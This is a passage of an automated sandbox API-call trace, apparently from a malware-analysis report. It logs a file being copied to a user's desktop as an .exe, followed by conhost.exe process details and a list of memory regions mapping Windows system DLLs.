0x20 [0078.138] SetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe", dwFileAttributes=0x20) returned 1 [0078.139] _wcsicmp (_String1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe", _String2="con") returned -53 [0078.284] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x10dedcc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0xa8 [0078.284] _open_osfhandle (_OSFileHandle=0xa8, _Flags=8) returned 4 [0078.284] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.284] GetFileType (hFile=0xa8) returned 0x1 [0078.284] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.284] FlushFileBuffers (hFile=0xa8) returned 1 [0078.898] _close (_FileHandle=4) returned 0 [0078.899] _wcsicmp (_String1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe", _String2="con") returned -53 [0078.899] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x10dedcc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0xa8 [0078.899] _open_osfhandle (_OSFileHandle=0xa8, _Flags=8) returned 4 [0078.899] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.899] GetFileType (hFile=0xa8) returned 0x1 [0078.899] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.899] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.899] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.899] SetFilePointer (in: hFile=0xa8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.899] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.899] GetFileSize (in: hFile=0xa4, lpFileSizeHigh=0x10dee58 | out: lpFileSizeHigh=0x10dee58*=0x0) returned 0x132200 [0078.900] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.900] GetFileSize (in: hFile=0xa8, lpFileSizeHigh=0x10dee50 | out: lpFileSizeHigh=0x10dee50*=0x0) returned 0x132200 [0078.900] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.900] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.905] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.905] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.906] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.906] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.907] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.907] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.907] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.907] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.907] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.907] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.908] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.908] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.908] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.908] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.908] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.908] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.909] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.909] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.910] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.910] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.910] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.910] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.911] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.911] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.911] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.911] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.911] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.911] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.912] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.912] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.912] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.912] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.916] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.916] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.917] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.917] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.917] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.918] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.918] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.918] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.918] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.918] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.919] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.919] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.919] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.919] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.919] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.919] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.920] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.920] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.921] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.921] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.921] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.921] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.922] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.922] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.922] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.922] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.922] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.922] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.922] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.923] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.923] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.923] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.923] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.923] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.923] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.923] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.924] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.924] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.924] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.924] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0xfe00, lpOverlapped=0x0) returned 1 [0078.924] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.924] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0xfe00, lpOverlapped=0x0) returned 1 [0078.924] _get_osfhandle (_FileHandle=3) returned 0xa4 [0078.924] ReadFile (in: hFile=0xa4, lpBuffer=0x1210000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x10dee08, lpOverlapped=0x0 | out: lpBuffer=0x1210000*, lpNumberOfBytesRead=0x10dee08*=0x4800, lpOverlapped=0x0) returned 1 [0078.925] _get_osfhandle (_FileHandle=4) returned 0xa8 [0078.925] ReadFile (in: hFile=0xa8, lpBuffer=0x1220000, nNumberOfBytesToRead=0x4800, lpNumberOfBytesRead=0x10dee54, lpOverlapped=0x0 | out: lpBuffer=0x1220000*, lpNumberOfBytesRead=0x10dee54*=0x4800, lpOverlapped=0x0) returned 1 [0078.925] _close (_FileHandle=4) returned 0 [0078.925] _close (_FileHandle=3) returned 0 [0078.925] FindNextFileW (in: hFindFile=0x55f90e8, lpFindFileData=0x55fb0c8 | out: lpFindFileData=0x55fb0c8) returned 0 [0078.925] GetLastError () returned 0x12 [0078.925] FindClose (in: hFindFile=0x55f90e8 | out: hFindFile=0x55f90e8) returned 1 [0078.927] _vsnwprintf (in: _Buffer=0x140ca10, _BufferCount=0x103, _Format="%9d", _ArgList=0x10df89c | out: _Buffer=" 1") returned 9 [0078.927] _get_osfhandle (_FileHandle=1) returned 0x3c [0078.927] GetFileType (hFile=0x3c) returned 0x2 [0078.927] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0078.927] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x10df7f8 | out: lpMode=0x10df7f8) returned 1 [0079.056] _get_osfhandle (_FileHandle=1) returned 0x3c [0079.056] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3c, lpConsoleScreenBufferInfo=0x10df848 | out: lpConsoleScreenBufferInfo=0x10df848) returned 1 [0079.219] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x1406940, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0082.578] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x1406940, nSize=0x2000, Arguments=0x10df878 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0082.578] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x10df82c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x10df82c*=0x1b) returned 1 [0082.579] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x10df8ac, ProcessInformationLength=0x4) returned 0x0 [0082.579] _get_osfhandle (_FileHandle=1) returned 0x3c [0082.579] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0082.580] _get_osfhandle (_FileHandle=1) returned 0x3c [0082.580] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0082.581] _get_osfhandle (_FileHandle=0) returned 0x38 [0082.581] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0082.582] SetConsoleInputExeNameW () returned 0x1 [0082.582] GetConsoleOutputCP () returned 0x1b5 [0082.584] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0082.584] SetThreadUILanguage (LangId=0x0) returned 0x409 [0082.586] exit (_Code=0) Thread: id = 14 os_tid = 0x76c Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2e1fc000" os_pid = "0x15c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x850" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 328 start_va = 0x7f391000 end_va = 0x7f391fff entry_point = 0x0 region_type = private name = "private_0x000000007f391000" filename = "" Region: id = 329 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 330 start_va = 0xa94d870000 end_va = 0xa94d88ffff entry_point = 0x0 region_type = private name = "private_0x000000a94d870000" filename = "" Region: id = 331 start_va = 0xa94d890000 end_va = 0xa94d8a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a94d890000" filename = "" Region: id = 332 start_va = 0xa94d8b0000 end_va = 0xa94d8effff entry_point = 0x0 region_type = private name = "private_0x000000a94d8b0000" filename = "" Region: id = 333 start_va = 0x7df5ff9e0000 end_va = 0x7ff5ff9dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff9e0000" filename = "" Region: id = 334 start_va = 0x7ff7fcd60000 end_va = 0x7ff7fcd82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fcd60000" filename = "" Region: id = 335 start_va = 0x7ff7fcd88000 end_va = 0x7ff7fcd88fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcd88000" filename = "" Region: id = 336 start_va = 0x7ff7fcd8e000 end_va = 0x7ff7fcd8ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcd8e000" filename = "" Region: id = 337 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 338 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 339 start_va = 0xa94d870000 end_va = 0xa94d87ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a94d870000" filename = "" Region: id = 340 start_va = 0xa94d9f0000 end_va = 0xa94daeffff entry_point = 0x0 region_type = private name = "private_0x000000a94d9f0000" filename = "" Region: id = 341 start_va = 0x7ff7fcc60000 end_va = 0x7ff7fcd5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fcc60000" filename = "" Region: id = 342 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 343 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 344 start_va = 0xa94d8f0000 end_va = 0xa94d9adfff entry_point = 0xa94d8f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 345 start_va = 0xa94d9b0000 end_va = 0xa94d9effff entry_point = 0x0 region_type = private name = "private_0x000000a94d9b0000" filename = "" Region: id = 346 start_va = 0xa94db40000 end_va = 0xa94db4ffff entry_point = 0x0 region_type = private name = "private_0x000000a94db40000" filename = "" Region: id = 347 start_va = 0x7ff7fcd8c000 end_va = 0x7ff7fcd8dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcd8c000" filename = "" Region: id = 348 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 349 start_va = 0xa94d880000 end_va = 0xa94d886fff entry_point = 0x0 region_type = private name = "private_0x000000a94d880000" filename = "" Region: id = 350 start_va = 0xa94daf0000 end_va = 0xa94daf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a94daf0000" filename = "" Region: id = 351 start_va = 0xa94db00000 end_va = 0xa94db06fff entry_point = 0x0 region_type = private name = "private_0x000000a94db00000" filename = "" Region: id = 352 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 353 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 354 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 355 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 356 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 357 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 358 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 359 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 360 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 361 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 362 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 363 start_va = 0xa94db10000 end_va = 0xa94db10fff entry_point = 0x0 region_type = private name = "private_0x000000a94db10000" filename = "" Region: id = 364 start_va = 0xa94db20000 end_va = 0xa94db20fff entry_point = 0x0 region_type = private name = "private_0x000000a94db20000" filename = "" Region: id = 365 start_va = 0xa94db50000 end_va = 0xa94dcd7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a94db50000" filename = "" Region: id = 366 start_va = 0xa94dce0000 end_va = 0xa94de60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a94dce0000" filename = "" Region: id = 367 start_va = 0xa94de70000 end_va = 0xa94f26ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a94de70000" filename = "" Region: id = 368 start_va = 0xa94f270000 end_va = 0xa94f2affff entry_point = 0x0 region_type = private name = "private_0x000000a94f270000" filename = "" Region: id = 369 start_va = 0xa94f430000 end_va = 0xa94f43ffff entry_point = 0x0 region_type = private name = "private_0x000000a94f430000" filename = "" Region: id = 370 start_va = 0x7ff7fcd8a000 end_va = 0x7ff7fcd8bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcd8a000" filename = "" Region: id = 371 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 372 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 373 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 